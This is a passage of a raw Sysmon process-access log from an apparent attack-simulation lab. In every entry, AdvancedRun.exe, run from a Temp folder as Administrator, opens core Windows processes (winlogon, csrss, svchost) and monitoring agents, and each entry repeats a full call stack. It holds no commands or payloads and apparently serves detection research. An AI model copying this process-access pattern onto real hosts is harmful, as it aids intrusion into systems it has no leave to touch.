20:17:20.829{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079756Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.829{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079755Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.829{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079754Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.829{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079753Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.828{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079752Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.828{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079751Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.828{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079750Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.828{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079749Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.828{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079748Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004079747Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079746Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079745Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079744Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079743Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.827{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C: